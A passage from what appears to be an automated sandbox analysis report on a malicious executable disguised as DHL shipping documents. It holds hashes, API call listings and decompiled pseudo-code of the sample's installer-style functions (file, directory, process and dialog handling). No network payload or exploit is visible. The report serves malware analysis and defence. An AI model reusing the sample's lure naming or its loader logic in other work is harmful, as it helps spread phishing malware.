                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                        • String ID:
                        • API String ID: 2547128583-0
                        • Opcode ID: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                        • Instruction ID: 0464b4a7853edb7079d0776797c383171681067eb8499b99987f1e8ea9f8efb8
                        • Opcode Fuzzy Hash: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                        • Instruction Fuzzy Hash: E0E086727042106AD210A6745D08D3773E8ABC6711307883EF557F2040D738DC359A79
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 68%
                        			E00406158(WCHAR* _a4, long _a8, long _a12) {
                        				signed int _t5;
                        				void* _t6;
                        
                        				_t5 = GetFileAttributesW(_a4); // executed
                        				asm("sbb ecx, ecx");
                        				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                        				return _t6;
                        			}






                        APIs
                        • GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exe,80000000,00000003), ref: 0040615C
                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: File$AttributesCreate
                        • String ID:
                        • API String ID: 415043291-0
                        • Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                        • Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
                        • Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                        • Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00406133(WCHAR* _a4) {
                        				signed char _t3;
                        				signed char _t7;
                        
                        				_t3 = GetFileAttributesW(_a4); // executed
                        				_t7 = _t3;
                        				if(_t7 != 0xffffffff) {
                        					SetFileAttributesW(_a4, _t3 & 0x000000fe); // executed
                        				}
                        				return _t7;
                        			}






                        APIs
                        • GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
                        • SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040614C
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: AttributesFile
                        • String ID:
                        • API String ID: 3188754299-0
                        • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                        • Instruction ID: 3e6336b5c460747e2e1e0fbe3c4db8defb42c0044e1a92967a1d29a512d2a4bc
                        • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                        • Instruction Fuzzy Hash: 73D0C972514130ABC2102728AE0889ABB56EB64271B014A35F9A5A62B0CB304C628A98
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00405C16(WCHAR* _a4) {
                        				int _t2;
                        
                        				_t2 = CreateDirectoryW(_a4, 0); // executed
                        				if(_t2 == 0) {
                        					return GetLastError();
                        				}
                        				return 0;
                        			}





                        APIs
                        • CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                        • GetLastError.KERNEL32 ref: 00405C2A
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: CreateDirectoryErrorLast
                        • String ID:
                        • API String ID: 1375471231-0
                        • Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                        • Instruction ID: 66e62c5d6c7775ff4cea72667941029308d228c48495a605f612c1d2d9e1fc74
                        • Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                        • Instruction Fuzzy Hash: FBC04C31218605AEE7605B219F0CB177A94DB50741F114839E186F40A0DA788455D92D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E004035F8(long _a4) {
                        				long _t2;
                        
                        				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                        				return _t2;
                        			}





                        APIs
                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: FilePointer
                        • String ID:
                        • API String ID: 973152223-0
                        • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                        • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                        • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                        • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 78%
                        			E00401FA4() {
                        				void* _t9;
                        				char _t13;
                        				void* _t15;
                        				void* _t17;
                        				void* _t20;
                        				void* _t22;
                        
                        				_t19 = E00402DA6(_t15);
                        				E004056CA(0xffffffeb, _t7);
                        				_t9 = E00405C4B(_t19); // executed
                        				_t20 = _t9;
                        				if(_t20 == _t15) {
                        					 *((intOrPtr*)(_t22 - 4)) = 1;
                        				} else {
                        					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
                        						_t13 = E00406AE0(_t17, _t20); // executed
                        						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
                        							if(_t13 != _t15) {
                        								 *((intOrPtr*)(_t22 - 4)) = 1;
                        							}
                        						} else {
                        							E004065AF( *((intOrPtr*)(_t22 - 0xc)), _t13);
                        						}
                        					}
                        					_push(_t20);
                        					CloseHandle();
                        				}
                        				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t22 - 4));
                        				return 0;
                        			}










                        APIs
                          • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                          • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                          • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                          • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                          • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                          • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                          • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                          • Part of subcall function 00405C4B: CreateProcessW.KERNELBASE ref: 00405C74
                          • Part of subcall function 00405C4B: CloseHandle.KERNEL32(?), ref: 00405C81
                        • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
                          • Part of subcall function 00406AE0: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
                          • Part of subcall function 00406AE0: GetExitCodeProcess.KERNELBASE ref: 00406B13
                          • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                        • String ID:
                        • API String ID: 2972824698-0
                        • Opcode ID: 98c10e394aa7211d00c312830497ac903b837474ab48397c41695a6fe6023c65
                        • Instruction ID: 7fe263eab699b123ac8c37dffe14ee58438593542e676086741668bd6549bbba
                        • Opcode Fuzzy Hash: 98c10e394aa7211d00c312830497ac903b837474ab48397c41695a6fe6023c65
                        • Instruction Fuzzy Hash: 3DF09072905112EBDF21BBA59AC4DAE76A4DF01318B25453BE102B21E0D77C4E528A6E
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 95%
                        			E00405809(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                        				struct HWND__* _v8;
                        				long _v12;
                        				struct tagRECT _v28;
                        				void* _v36;
                        				signed int _v40;
                        				int _v44;
                        				int _v48;
                        				signed int _v52;
                        				int _v56;
                        				void* _v60;
                        				void* _v68;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				struct HWND__* _t94;
                        				long _t95;
                        				int _t100;
                        				void* _t108;
                        				intOrPtr _t130;
                        				struct HWND__* _t134;
                        				int _t156;
                        				int _t159;
                        				struct HMENU__* _t164;
                        				struct HWND__* _t168;
                        				struct HWND__* _t169;
                        				int _t171;
                        				void* _t172;
                        				short* _t173;
                        				short* _t175;
                        				int _t177;
                        
                        				_t169 =  *0x429244;
                        				_t156 = 0;
                        				_v8 = _t169;
                        				if(_a8 != 0x110) {
                        					if(_a8 == 0x405) {
                        						CloseHandle(CreateThread(0, 0, E0040579D, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
                        					}
                        					if(_a8 != 0x111) {
                        						L17:
                        						_t171 = 1;
                        						if(_a8 != 0x404) {
                        							L25:
                        							if(_a8 != 0x7b) {
                        								goto L20;
                        							}
                        							_t94 = _v8;
                        							if(_a12 != _t94) {
                        								goto L20;
                        							}
                        							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
                        							_a8 = _t95;
                        							if(_t95 <= _t156) {
                        								L36:
                        								return 0;
                        							}
                        							_t164 = CreatePopupMenu();
                        							AppendMenuW(_t164, _t156, _t171, E004066A5(_t156, _t164, _t171, _t156, 0xffffffe1));
                        							_t100 = _a16;
                        							_t159 = _a16 >> 0x10;
                        							if(_a16 == 0xffffffff) {
                        								GetWindowRect(_v8,  &_v28);
                        								_t100 = _v28.left;
                        								_t159 = _v28.top;
                        							}
                        							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
                        								_v60 = _t156;
                        								_v48 = 0x423748;
                        								_v44 = 0x1000;
                        								_a4 = _a8;
                        								do {
                        									_a4 = _a4 - 1;
                        									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
                        								} while (_a4 != _t156);
                        								OpenClipboard(_t156);
                        								EmptyClipboard();
                        								_t108 = GlobalAlloc(0x42, _t171 + _t171);
                        								_a4 = _t108;
                        								_t172 = GlobalLock(_t108);
                        								do {
                        									_v48 = _t172;
                        									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
                        									 *_t173 = 0xd;
                        									_t175 = _t173 + 2;
                        									 *_t175 = 0xa;
                        									_t172 = _t175 + 2;
                        									_t156 = _t156 + 1;
                        								} while (_t156 < _a8);
                        								GlobalUnlock(_a4);
                        								SetClipboardData(0xd, _a4);
                        								CloseClipboard();
                        							}
                        							goto L36;
                        						}
                        						if( *0x42922c == _t156) {
                        							ShowWindow( *0x42a268, 8);
                        							if( *0x42a2ec == _t156) {
                        								E004056CA( *((intOrPtr*)( *0x422720 + 0x34)), _t156);
                        							}
                        							E0040459D(_t171);
                        							goto L25;
                        						}
                        						 *0x421f18 = 2;
                        						E0040459D(0x78);
                        						goto L20;
                        					} else {
                        						if(_a12 != 0x403) {
                        							L20:
                        							return E0040462B(_a8, _a12, _a16);
                        						}
                        						ShowWindow( *0x429230, _t156);
                        						ShowWindow(_t169, 8);
                        						E004045F9(_t169);
                        						goto L17;
                        					}
                        				}
                        				_v52 = _v52 | 0xffffffff;
                        				_v40 = _v40 | 0xffffffff;
                        				_t177 = 2;
                        				_v60 = _t177;
                        				_v56 = 0;
                        				_v48 = 0;
                        				_v44 = 0;
                        				asm("stosd");
                        				asm("stosd");
                        				_t130 =  *0x42a270;
                        				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
                        				_a12 =  *((intOrPtr*)(_t130 + 0x60));
                        				 *0x429230 = GetDlgItem(_a4, 0x403);
                        				 *0x429228 = GetDlgItem(_a4, 0x3ee);
                        				_t134 = GetDlgItem(_a4, 0x3f8);
                        				 *0x429244 = _t134;
                        				_v8 = _t134;
                        				E004045F9( *0x429230);
                        				 *0x429234 = E00404F52(4);
                        				 *0x42924c = 0;
                        				GetClientRect(_v8,  &_v28);
                        				_v52 = _v28.right - GetSystemMetrics(_t177);
                        				SendMessageW(_v8, 0x1061, 0,  &_v60);
                        				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
                        				if(_a8 >= 0) {
                        					SendMessageW(_v8, 0x1001, 0, _a8);
                        					SendMessageW(_v8, 0x1026, 0, _a8);
                        				}
                        				if(_a12 >= _t156) {
                        					SendMessageW(_v8, 0x1024, _t156, _a12);
                        				}
                        				_push( *((intOrPtr*)(_a16 + 0x30)));
                        				_push(0x1b);
                        				E004045C4(_a4);
                        				if(( *0x42a278 & 0x00000003) != 0) {
                        					ShowWindow( *0x429230, _t156);
                        					if(( *0x42a278 & 0x00000002) != 0) {
                        						 *0x429230 = _t156;
                        					} else {
                        						ShowWindow(_v8, 8);
                        					}
                        					E004045F9( *0x429228);
                        				}
                        				_t168 = GetDlgItem(_a4, 0x3ec);
                        				SendMessageW(_t168, 0x401, _t156, 0x75300000);
                        				if(( *0x42a278 & 0x00000004) != 0) {
                        					SendMessageW(_t168, 0x409, _t156, _a12);
                        					SendMessageW(_t168, 0x2001, _t156, _a8);
                        				}
                        				goto L36;
                        			}


































                        APIs
                        • GetDlgItem.USER32 ref: 00405867
                        • GetDlgItem.USER32 ref: 00405876
                        • GetClientRect.USER32 ref: 004058B3
                        • GetSystemMetrics.USER32 ref: 004058BA
                        • SendMessageW.USER32(?,00001061,00000000,?), ref: 004058DB
                        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004058EC
                        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004058FF
                        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040590D
                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405920
                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405942
                        • ShowWindow.USER32(?,00000008), ref: 00405956
                        • GetDlgItem.USER32 ref: 00405977
                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405987
                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059A0
                        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059AC
                        • GetDlgItem.USER32 ref: 00405885
                          • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                        • GetDlgItem.USER32 ref: 004059C9
                        • CreateThread.KERNEL32 ref: 004059D7
                        • CloseHandle.KERNEL32(00000000), ref: 004059DE
                        • ShowWindow.USER32(00000000), ref: 00405A02
                        • ShowWindow.USER32(?,00000008), ref: 00405A07
                        • ShowWindow.USER32(00000008), ref: 00405A51
                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405A85
                        • CreatePopupMenu.USER32 ref: 00405A96
                        • AppendMenuW.USER32 ref: 00405AAA
                        • GetWindowRect.USER32 ref: 00405ACA
                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405AE3
                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B1B
                        • OpenClipboard.USER32(00000000), ref: 00405B2B
                        • EmptyClipboard.USER32 ref: 00405B31
                        • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B3D
                        • GlobalLock.KERNEL32 ref: 00405B47
                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B5B
                        • GlobalUnlock.KERNEL32(00000000), ref: 00405B7B
                        • SetClipboardData.USER32 ref: 00405B86
                        • CloseClipboard.USER32 ref: 00405B8C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                        • String ID: H7B${
                        • API String ID: 590372296-2256286769
                        • Opcode ID: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
                        • Instruction ID: d0bbb34d81c2c7a38b5cdb5171fa906e4f4201ee6cbe22cb0b3272b57562556b
                        • Opcode Fuzzy Hash: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
                        • Instruction Fuzzy Hash: D8B137B0900608FFDF119FA0DD89AAE7B79FB08354F00417AFA45A61A0CB755E52DF68
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 78%
                        			E00404AB5(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                        				signed int _v8;
                        				signed int _v12;
                        				long _v16;
                        				long _v20;
                        				long _v24;
                        				char _v28;
                        				intOrPtr _v32;
                        				long _v36;
                        				char _v40;
                        				unsigned int _v44;
                        				signed int _v48;
                        				WCHAR* _v56;
                        				intOrPtr _v60;
                        				intOrPtr _v64;
                        				intOrPtr _v68;
                        				WCHAR* _v72;
                        				void _v76;
                        				struct HWND__* _v80;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				intOrPtr _t82;
                        				long _t87;
                        				short* _t89;
                        				void* _t95;
                        				signed int _t96;
                        				int _t109;
                        				signed short _t114;
                        				signed int _t118;
                        				struct HWND__** _t122;
                        				intOrPtr* _t138;
                        				WCHAR* _t146;
                        				unsigned int _t150;
                        				signed int _t152;
                        				unsigned int _t156;
                        				signed int _t158;
                        				signed int* _t159;
                        				signed int* _t160;
                        				struct HWND__* _t166;
                        				struct HWND__* _t167;
                        				int _t169;
                        				unsigned int _t197;
                        
                        				_t156 = __edx;
                        				_t82 =  *0x422720;
                        				_v32 = _t82;
                        				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x42b000;
                        				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                        				if(_a8 == 0x40b) {
                        					E00405CAC(0x3fb, _t146);
                        					E004068EF(_t146);
                        				}
                        				_t167 = _a4;
                        				if(_a8 != 0x110) {
                        					L8:
                        					if(_a8 != 0x111) {
                        						L20:
                        						if(_a8 == 0x40f) {
                        							L22:
                        							_v8 = _v8 & 0x00000000;
                        							_v12 = _v12 & 0x00000000;
                        							E00405CAC(0x3fb, _t146);
                        							if(E0040603F(_t186, _t146) == 0) {
                        								_v8 = 1;
                        							}
                        							E00406668(0x421718, _t146);
                        							_t87 = E00406A35(1);
                        							_v16 = _t87;
                        							if(_t87 == 0) {
                        								L30:
                        								E00406668(0x421718, _t146);
                        								_t89 = E00405FE2(0x421718);
                        								_t158 = 0;
                        								if(_t89 != 0) {
                        									 *_t89 = 0;
                        								}
                        								if(GetDiskFreeSpaceW(0x421718,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                        									goto L35;
                        								} else {
                        									_t169 = 0x400;
                        									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                        									asm("cdq");
                        									_v48 = _t109;
                        									_v44 = _t156;
                        									_v12 = 1;
                        									goto L36;
                        								}
                        							} else {
                        								_t159 = 0;
                        								if(0 == 0x421718) {
                        									goto L30;
                        								} else {
                        									goto L26;
                        								}
                        								while(1) {
                        									L26:
                        									_t114 = _v16(0x421718,  &_v48,  &_v28,  &_v40);
                        									if(_t114 != 0) {
                        										break;
                        									}
                        									if(_t159 != 0) {
                        										 *_t159 =  *_t159 & _t114;
                        									}
                        									_t160 = E00405F83(0x421718);
                        									 *_t160 =  *_t160 & 0x00000000;
                        									_t159 = _t160;
                        									 *_t159 = 0x5c;
                        									if(_t159 != 0x421718) {
                        										continue;
                        									} else {
                        										goto L30;
                        									}
                        								}
                        								_t150 = _v44;
                        								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                        								_v44 = _t150 >> 0xa;
                        								_v12 = 1;
                        								_t158 = 0;
                        								__eflags = 0;
                        								L35:
                        								_t169 = 0x400;
                        								L36:
                        								_t95 = E00404F52(5);
                        								if(_v12 != _t158) {
                        									_t197 = _v44;
                        									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                        										_v8 = 2;
                        									}
                        								}
                        								if( *((intOrPtr*)( *0x42923c + 0x10)) != _t158) {
                        									E00404F3A(0x3ff, 0xfffffffb, _t95);
                        									if(_v12 == _t158) {
                        										SetDlgItemTextW(_a4, _t169, 0x421708);
                        									} else {
                        										E00404E71(_t169, 0xfffffffc, _v48, _v44);
                        									}
                        								}
                        								_t96 = _v8;
                        								 *0x42a304 = _t96;
                        								if(_t96 == _t158) {
                        									_v8 = E0040140B(7);
                        								}
                        								if(( *(_v32 + 0x14) & _t169) != 0) {
                        									_v8 = _t158;
                        								}
                        								E004045E6(0 | _v8 == _t158);
                        								if(_v8 == _t158 &&  *0x423738 == _t158) {
                        									E00404A0E();
                        								}
                        								 *0x423738 = _t158;
                        								goto L53;
                        							}
                        						}
                        						_t186 = _a8 - 0x405;
                        						if(_a8 != 0x405) {
                        							goto L53;
                        						}
                        						goto L22;
                        					}
                        					_t118 = _a12 & 0x0000ffff;
                        					if(_t118 != 0x3fb) {
                        						L12:
                        						if(_t118 == 0x3e9) {
                        							_t152 = 7;
                        							memset( &_v76, 0, _t152 << 2);
                        							_v80 = _t167;
                        							_v72 = 0x423748;
                        							_v60 = E00404E0B;
                        							_v56 = _t146;
                        							_v68 = E004066A5(_t146, 0x423748, _t167, 0x421f20, _v12);
                        							_t122 =  &_v80;
                        							_v64 = 0x41;
                        							__imp__SHBrowseForFolderW(_t122);
                        							if(_t122 == 0) {
                        								_a8 = 0x40f;
                        							} else {
                        								__imp__CoTaskMemFree(_t122);
                        								E00405F37(_t146);
                        								_t125 =  *((intOrPtr*)( *0x42a270 + 0x11c));
                        								if( *((intOrPtr*)( *0x42a270 + 0x11c)) != 0 && _t146 == L"C:\\Users\\hardz\\AppData\\Local\\Temp") {
                        									E004066A5(_t146, 0x423748, _t167, 0, _t125);
                        									if(lstrcmpiW(0x428200, 0x423748) != 0) {
                        										lstrcatW(_t146, 0x428200);
                        									}
                        								}
                        								 *0x423738 =  *0x423738 + 1;
                        								SetDlgItemTextW(_t167, 0x3fb, _t146);
                        							}
                        						}
                        						goto L20;
                        					}
                        					if(_a12 >> 0x10 != 0x300) {
                        						goto L53;
                        					}
                        					_a8 = 0x40f;
                        					goto L12;
                        				} else {
                        					_t166 = GetDlgItem(_t167, 0x3fb);
                        					if(E00405FAE(_t146) != 0 && E00405FE2(_t146) == 0) {
                        						E00405F37(_t146);
                        					}
                        					 *0x429238 = _t167;
                        					SetWindowTextW(_t166, _t146);
